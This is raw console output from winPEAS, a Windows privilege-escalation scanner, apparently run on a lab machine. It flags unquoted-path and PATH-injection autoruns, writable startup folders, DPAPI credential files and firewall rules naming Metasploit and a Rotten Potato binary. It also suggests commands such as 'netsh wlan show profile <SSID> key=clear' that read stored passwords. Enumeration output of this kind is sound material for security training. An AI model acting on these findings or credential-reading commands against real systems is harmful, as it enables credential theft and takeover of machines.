[33m  [+] [1;32mCurrent Active Window Application[0m
[1;90mSystem.NullReferenceException: Object reference not set to an instance of an object.
   at winPEAS.MyUtils.GetPermissionsFile(String path, Dictionary`2 SIDs)
   at winPEAS.Program.<PrintInfoApplications>g__PrintActiveWindow|43_0()[0m

[33m  [+] [1;32mInstalled Applications --Via Program Files/Uninstall registry--[0m
[33m   [?] [1;34mCheck if you can modify installed software [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software[0m
[1;32m    C:\Program Files (x86)\Adobe\Reader 8.0\Reader[0m
[1;32m    C:\Program Files\7-Zip[0m
[1;32m    C:\Program Files\Common Files[0m
[1;32m    C:\Program Files\desktop.ini[0m
[1;32m    C:\Program Files\Internet Explorer[0m
[1;32m    C:\Program Files\Uninstall Information[0m
[1;32m    C:\Program Files\VMware[0m
[1;32m    C:\Program Files\Windows Defender[0m
[1;32m    C:\Program Files\Windows Journal[0m
[1;32m    C:\Program Files\Windows Mail[0m
[1;32m    C:\Program Files\Windows Media Player[0m
[1;32m    C:\Program Files\Windows Multimedia Platform[0m
[1;32m    C:\Program Files\Windows NT[0m
[1;32m    C:\Program Files\Windows Photo Viewer[0m
[1;32m    C:\Program Files\Windows Portable Devices[0m
[1;32m    C:\Program Files\Windows Sidebar[0m
[1;32m    C:\Program Files\WindowsApps[0m
[1;32m    C:\Program Files\WindowsPowerShell[0m


[33m  [+] [1;32mAutorun Applications[0m
[33m   [?] [1;34mCheck if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries[0m
[1;90mError getting autoruns from WMIC: System.ArgumentException: The path is not of a legal form.
   at System.IO.Path.NormalizePath(String path, Boolean fullCheck, Int32 maxPathLength, Boolean expandShortPaths)
   at System.IO.Path.GetDirectoryName(String path)
   at winPEAS.ApplicationInfo.GetAutoRunsWMIC()[0m

    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[0m
    Key: VMware User Process
    Folder: [0m[1;32mC:\Program Files\VMware\VMware Tools[0m
    File: [0m[1;32mC:\Program Files\VMware\VMware Tools[0m\vmtoolsd.exe -n vmusr ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run[0m
    Key: Adobe Reader Speed Launcher
    Folder: [0m[1;32mC:\Program Files (x86)\Adobe\Reader 8.0\Reader[0m
    File: [0m[1;32mC:\Program Files (x86)\Adobe\Reader 8.0\Reader[0m\Reader_sl.exe ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders[0m
    Key: Common Startup
    Folder: [0m[1;32mC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup[0m ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders[0m
    Key: Common Startup
    Folder: [0m[1;32mC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup[0m ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon[0m
    Key: Userinit
    Folder: [0m[1;32mC:\Windows\system32[0m
    File: [0m[1;32mC:\Windows\system32[0m\userinit.exe,
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon[0m
    Key: Shell
    Folder: None ([0m[1;31mPATH Injection[0m)
    File: [0m[1;32mexplorer.exe[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot[0m
    Key: AlternateShell
    Folder: None ([0m[1;31mPATH Injection[0m)
    File: [0m[1;32mcmd.exe[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers[0m
    Key: Adobe Type Manager
    Folder: None ([0m[1;31mPATH Injection[0m)
    File: [0m[1;32matmfd.dll[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers[0m
    Key: Adobe Type Manager
    Folder: None ([0m[1;31mPATH Injection[0m)
    File: [0m[1;32matmfd.dll[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Classes\htmlfile\shell\open\command[0m
    Folder: [0m[1;32mC:\Program Files\Internet Explorer[0m
    File: [0m[1;32mC:\Program Files\Internet Explorer[0m\iexplore.exe %1 ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: HKLM[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m\[0m[0m[0m[0m[0mSOFTWARE[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m\[0m[0m[0m[0m[0mMicrosoft[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m\[0m[0m[0m[0m[0mActive Setup[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m\[0m[0m[0m[0m[0mInstalled Components[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m[0m[1;31m\[0m[0m[0m[0m[0m{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
    Key: StubPath
    Folder: [0m[1;31m\[0m
    [0m[1;31mFolderPerms: Authenticated Users [AppendData/CreateDirectories][0m
    File: [0m[1;32m/UserInstall[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Program Files\Windows Mail[0m
    File: [0m[1;32mC:\Program Files\Windows Mail[0m\WinMail.exe OCInstallUserConfigOE ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D715857-A67C-4C2F-A929-038448584D63}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Windows\System32[0m
    File: [0m[1;32mC:\Windows\System32[0m\ie4uinit.exe -DisableSSL3
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}[0m
    Key: StubPath
    Folder: None ([0m[1;31mPATH Injection[0m)
    File: [0m[1;32mU[0m
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Windows\System32[0m
    File: [0m[1;32mC:\Windows\System32[0m\ie4uinit.exe -UserConfig
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Windows\System32[0m
    File: [0m[1;32m[0m[1;32mC:\Windows\System32[0m[0m\Rundll32.exe [0m[1;32m[0m[1;32mC:\Windows\System32[0m[0m\mscories.dll,Install
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Program Files\Windows Mail[0m
    File: [0m[1;32mC:\Program Files\Windows Mail[0m\WinMail.exe OCInstallUserConfigOE ([0m[1;31mUnquoted and Space detected[0m)
[1;90m   =================================================================================================[0m


    RegPath: [0m[1;32mHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}[0m
    Key: StubPath
    Folder: [0m[1;32mC:\Windows\SysWOW64[0m
    File: [0m[1;32m[0m[1;32mC:\Windows\SysWOW64[0m[0m\Rundll32.exe [0m[1;32m[0m[1;32mC:\Windows\SysWOW64[0m[0m\mscories.dll,Install
[1;90m   =================================================================================================[0m


    Folder: [0m[1;31mC:\Users\Bethany\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup[0m
    [0m[1;31mFolderPerms: Bethany [AllAccess][0m
    File: [0m[1;31mC:\Users\Bethany\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup[0m\desktop.ini
    [0m[1;31mFilePerms: Bethany [AllAccess][0m
[1;90m   =================================================================================================[0m


    Folder: [0m[1;31mC:\Users\Bethany\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup[0m
    [0m[1;31mFolderPerms: Bethany [AllAccess][0m
    File: [0m[1;31mC:\Users\Bethany\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup[0m\HFS.lnk
    [0m[1;31mFilePerms: Bethany [AllAccess][0m
[1;90m   =================================================================================================[0m


    Folder: [0m[1;32mC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup[0m
    File: [0m[1;32mC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup[0m\desktop.ini
[1;90m   =================================================================================================[0m


[33m  [+] [1;32mScheduled Applications --Non Microsoft--[0m
[33m   [?] [1;34mCheck if you can modify other users scheduled binaries [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries[0m
    (Bethany\Bethany) Boot to Desktop: [0m[1;32mC:\Windows\explorer.exe [0m
    Trigger: At log on of Bethany\Bethany
    
[1;90m   =================================================================================================[0m


[33m  [+] [1;32mDevice Drivers --Non Microsoft--[0m
[33m   [?] [1;34mCheck 3rd party drivers for known vulnerabilities/rootkits. [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#vulnerable-drivers[0m
    VMware PCI VMCI Bus Device - 9.7.1.0 build-2103963 [VMware, Inc.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\System32\drivers\vmci.sys[0m
    VMware vSockets Service - 9.7.0.0 build-2103963 [VMware, Inc.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\system32\drivers\vsock.sys[0m
    VMware Raw Disk Helper Driver - 0.9.9.0 build-3917699 [VMware, Inc.]: [0m[1;32mC:\Program Files\VMware\VMware Tools\vmrawdsk.sys[0m
    VMware HGFS File System Driver - 11.0.0.0 build-3917699 [VMware, Inc.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\system32\drivers\vmhgfs.sys[0m
    VMware Pointing PS/2 Device Driver - 12.5.4.0 build-2869231 [VMware, Inc.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\System32\drivers\vmmouse.sys[0m
    VMware SVGA 3D - 8.15.01.0046 - build-3774095 [VMware, Inc.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\system32\DRIVERS\vm3dmp.sys[0m
    VMware server memory controller - 7.3.5.0 build-3917699 [VMware, Inc.]: [0m[1;32mC:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys[0m
    Macrovision SECURITY Driver - SECURITY Driver 4.03.086 2006/09/13 [Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\System32\Drivers\secdrv.SYS[0m
    Intel(R) Gigabit Adapter - 12.6.47.0 [Intel Corporation]: [0m[1;32m\\.\GLOBALROOT\SystemRoot\system32\DRIVERS\e1i63x64.sys[0m


[1;36m  =========================================([0m[33mNetwork Information[1;36m)=========================================[0m

[33m  [+] [1;32mNetwork Shares[0m
    [0m[1;32mADMIN$[0m ([1;37mPath: C:\Windows[0m)
    [0m[1;32mC$[0m ([1;37mPath: C:\[0m)
    [0m[1;32mIPC$[0m ([1;37mPath: [0m)
    [0m[1;32mprint$[0m ([1;37mPath: C:\Windows\system32\spool\drivers[0m)
    Public ([1;37mPath: C:\Users\Public[0m)
    Users ([1;37mPath: C:\Users[0m) -- [0m[1;31mPermissions: AllAccess[0m

[33m  [+] [1;32mHost File[0m
    127.0.0.1  win8.ipv6.microsoft.com

[33m  [+] [1;32mNetwork Ifaces and known hosts[0m
[33m   [?] [1;34mThe masks are only for the IPv4 addresses [1;33m[0m
[1;90m  [X] Exception: The requested protocol has not been configured into the system, or no implementation for it exists[0m
    Ethernet 2[00:50:56:BF:27:D3]: 10.11.1.50 / 255.255.0.0
        [1;37mGateways: [0m10.11.0.1
        [1;37mDNSs: [0m10.11.1.1
    Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
        [1;37mDNSs: [0mfec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1

[33m  [+] [1;32mCurrent Listening Ports[0m
[33m   [?] [1;34mCheck for services restricted from the outside [1;33m[0m
    Proto     Local Address          Foreign Address        State
    TCP       0.0.0.0:80                                    Listening
    TCP       0.0.0.0:135                                   Listening
    TCP       0.0.0.0:445                                   Listening
    TCP       0.0.0.0:9505                                  Listening
    TCP       0.0.0.0:49152                                 Listening
    TCP       0.0.0.0:49153                                 Listening
    TCP       0.0.0.0:49154                                 Listening
    TCP       0.0.0.0:49155                                 Listening
    TCP       0.0.0.0:49156                                 Listening
    TCP       0.0.0.0:49157                                 Listening
    TCP       10.11.1.50:139                                Listening
    TCP       [::]:80                                       Listening
    TCP       [::]:135                                      Listening
    TCP       [::]:445                                      Listening
    TCP       [::]:49152                                    Listening
    TCP       [::]:49153                                    Listening
    TCP       [::]:49154                                    Listening
    TCP       [::]:49155                                    Listening
    TCP       [::]:49156                                    Listening
    TCP       [::]:49157                                    Listening
    UDP       0.0.0.0:5355                                  Listening
    UDP       10.11.1.50:137                                Listening
    UDP       10.11.1.50:138                                Listening
    UDP       10.11.1.50:1900                               Listening
    UDP       [0m[1;31m127.0.0.1[0m:1900                                Listening
    UDP       [0m[1;31m127.0.0.1[0m:59616                               Listening
    UDP       [::1]:1900                                    Listening
    UDP       [::1]:59615                                   Listening

[33m  [+] [1;32mFirewall Rules[0m
[33m   [?] [1;34mShowing only DENY rules (too many ALLOW rules always) [1;33m[0m
    Current Profiles: PUBLIC
    FirewallEnabled (Domain):    [0m[1;32mTrue[0m
    FirewallEnabled (Private):    [0m[1;32mTrue[0m
    FirewallEnabled (Public):    [0m[1;32mTrue[0m
[1;90m    DENY rules:[0m
    (4)msfrottenpotato.exe[[0m[1;31mC:\users\bethany\desktop\msfrottenpotato.exe[0m]: DENY UDP IN from *:* --> *:*
    [0m[1;31mFile Permissions: Bethany [AllAccess][0m
    [0m[1;31mFolder Permissions: Bethany [AllAccess][0m
    msfrottenpotato.exe
    (4)msfrottenpotato.exe[[0m[1;31mC:\users\bethany\desktop\msfrottenpotato.exe[0m]: DENY TCP IN from *:* --> *:*
    [0m[1;31mFile Permissions: Bethany [AllAccess][0m
    [0m[1;31mFolder Permissions: Bethany [AllAccess][0m
    msfrottenpotato.exe
    (2147483647)PTH[]: DENY TCP IN from *:443 --> 192.168.0.0/255.255.0.0:*
    
    (2147483647)Metasploit[]: DENY TCP OUT from *:4444 --> *:*
    
    (2147483647)PTH (TCP)[]: DENY TCP IN from *:445 --> 10.0.0.0/255.0.0.0,172.6.0.0/255.255.0.0,192.168.0.0/255.255.0.0:*
    
    (2147483647)PTH (UDP)[]: DENY UDP IN from *:* --> 10.0.0.0/255.0.0.0,172.16.0.0/255.255.0.0,192.168.0.0/255.255.0.0:*
    
    (2147483647)SMB[]: DENY TCP OUT from 192.160.0.0/255.240.0.0:135,137,445 --> *:*
    
    (2147483647)SMB[]: DENY UDP OUT from 192.160.0.0/255.240.0.0:* --> *:*
    

[33m  [+] [1;32mDNS cached --limit 70--[0m
[1;90m    Entry                                 Name                                  Data[0m
    1.0.0.127.in-addr.arpa                1.0.0.127.in-addr.arpa.               win8.ipv6.microsoft.com
    win8.ipv6.microsoft.com               win8.ipv6.microsoft.com               127.0.0.1
    win8.ipv6.microsoft.com                                                     


[1;36m  =========================================([0m[33mWindows Credentials[1;36m)=========================================[0m

[33m  [+] [1;32mChecking Windows Vault[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mChecking Credential manager[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault[0m
[1;90m    This function is not yet implemented.[0m
[33m    [i] [1;34mIf you want to list credentials inside Credential Manager use 'cmdkey /list'[0m

[33m  [+] [1;32mSaved RDP connections[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mRecently run commands[0m
[1;37m    a: [0mcmd\1
[1;37m    MRUList: [0ma

[33m  [+] [1;32mChecking for DPAPI Master Keys[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi[0m
[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\0b50e251-01ef-4716-b406-7ab16e47c25a
[1;37m    Accessed: [0m7/20/2015 4:33:03 PM
[1;37m    Modified: [0m7/20/2015 4:33:03 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\100f964d-31ab-4fa2-a661-40d27665ddd9
[1;37m    Accessed: [0m2/10/2020 2:16:46 PM
[1;37m    Modified: [0m2/10/2020 2:16:46 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\355e0c19-729c-482e-85f1-13938ae08214
[1;37m    Accessed: [0m11/15/2014 9:15:00 AM
[1;37m    Modified: [0m11/15/2014 9:15:00 AM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\6fd073aa-ffd3-4bb2-823c-64c506f184e2
[1;37m    Accessed: [0m3/10/2021 6:49:38 PM
[1;37m    Modified: [0m3/10/2021 6:49:38 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\86c37806-3ab9-4cf1-86c2-dc2473a5d156
[1;37m    Accessed: [0m4/2/2016 4:10:09 PM
[1;37m    Modified: [0m4/2/2016 4:10:09 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\8ca5a987-13fa-4f9c-b4de-0b2d72ddf364
[1;37m    Accessed: [0m12/7/2015 7:23:36 PM
[1;37m    Modified: [0m12/7/2015 7:23:36 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\afc76b1a-0753-47fd-9cb4-86c82e1897f7
[1;37m    Accessed: [0m3/29/2017 9:38:48 PM
[1;37m    Modified: [0m3/29/2017 9:38:48 PM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\d87380bd-27bf-42a1-892d-613d48a061c9
[1;37m    Accessed: [0m1/17/2018 1:55:42 AM
[1;37m    Modified: [0m1/17/2018 1:55:42 AM
[1;90m   =================================================================================================[0m

[1;37m    MasterKey: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Protect\S-1-5-21-471342483-1622715373-4132421626-1002\fbd1319f-d18d-448f-92e2-287944ecf24c
[1;37m    Accessed: [0m2/27/2015 4:27:24 PM
[1;37m    Modified: [0m2/27/2015 4:27:24 PM
[1;90m   =================================================================================================[0m


[33m  [+] [1;32mChecking for DPAPI Credential Files[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi[0m
[1;37m    CredFile: [0mC:\Users\Bethany\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
[1;37m    Description: [0mLocal Credential Data  
[1;37m    MasterKey: [0mfbd1319f-d18d-448f-92e2-287944ecf24c
[1;37m    Accessed: [0m3/29/2015 6:50:00 PM
[1;37m    Modified: [0m3/29/2015 6:50:00 PM
[1;37m    Size: [0m3408
[1;90m   =================================================================================================[0m

[1;37m    CredFile: [0mC:\Users\Bethany\AppData\Roaming\Microsoft\Credentials\AB5B1AB1FFB5FA3EBDDAABF4409A0D25
[1;37m    Description: [0mEnterprise Credential Data  
[1;37m    MasterKey: [0m355e0c19-729c-482e-85f1-13938ae08214
[1;37m    Accessed: [0m11/15/2014 9:16:13 AM
[1;37m    Modified: [0m11/15/2014 9:16:13 AM
[1;37m    Size: [0m506
[1;90m   =================================================================================================[0m

[33m    [i] [1;34mFollow the provided link for further instructions in how to decrypt the creds file[0m

[33m  [+] [1;32mChecking for RDCMan Settings Files[0m
[33m   [?] [1;34mDump credentials from Remote Desktop Connection Manager [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for kerberos tickets[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/pentesting/pentesting-kerberos-88[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking saved Wifis[0m
[1;90m    This function is not yet implemented.[0m
[33m    [i] [1;34mIf you want to list saved Wifis connections you can list the using 'netsh wlan show profile'[0m
[33m    [i] [1;34mIf you want to get the clear-text password use 'netsh wlan show profile <SSID> key=clear'[0m

[33m  [+] [1;32mLooking AppCmd.exe[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe[0m
[1;31m    AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials[0m

[33m  [+] [1;32mLooking SSClient.exe[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#scclient-sccm[0m
[1;90m    Not Found[0m


[1;36m  ========================================([0m[33mBrowsers Information[1;36m)========================================[0m

[33m  [+] [1;32mLooking for Firefox DBs[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for GET credentials in Firefox history[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for Chrome DBs[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for GET credentials in Chrome history[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mChrome bookmarks[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mCurrent IE tabs[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for GET credentials in IE history[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history[0m

[33m  [+] [1;32mIE favorites[0m
    http://go.microsoft.com/fwlink/p/?LinkId=255142


[1;36m  ==============================([0m[33mInteresting files and registry[1;36m)==============================[0m

[33m  [+] [1;32mPutty Sessions[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mPutty SSH Host keys[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mSSH keys in registry[0m
[33m   [?] [1;34mIf you find anything here, follow the link to learn how to decrypt the SSH keys [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-in-registry[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mCloud Credentials[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mUnattend Files[0m

[33m  [+] [1;32mLooking for common SAM & SYSTEM backups[0m

[33m  [+] [1;32mLooking for McAfee Sitelist.xml Files[0m

[33m  [+] [1;32mCached GPP Passwords[0m
  [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.

[33m  [+] [1;32mLooking for possible regs with creds[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry[0m
[1;90m    Not Found[0m
[1;90m    Not Found[0m
[1;90m    Not Found[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mLooking for possible password files in users homes[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files[0m

[33m  [+] [1;32mLooking inside the Recycle Bin for creds files[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mSearching known files that can contain creds in home[0m
[33m   [?] [1;34m [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files[0m
    C:\Users\Bethany\NTUSER.DAT

[33m  [+] [1;32mLooking for documents --limit 100--[0m
[1;90m    Not Found[0m

[33m  [+] [1;32mRecent files --limit 70--[0m
[1;90m    Not Found[0m
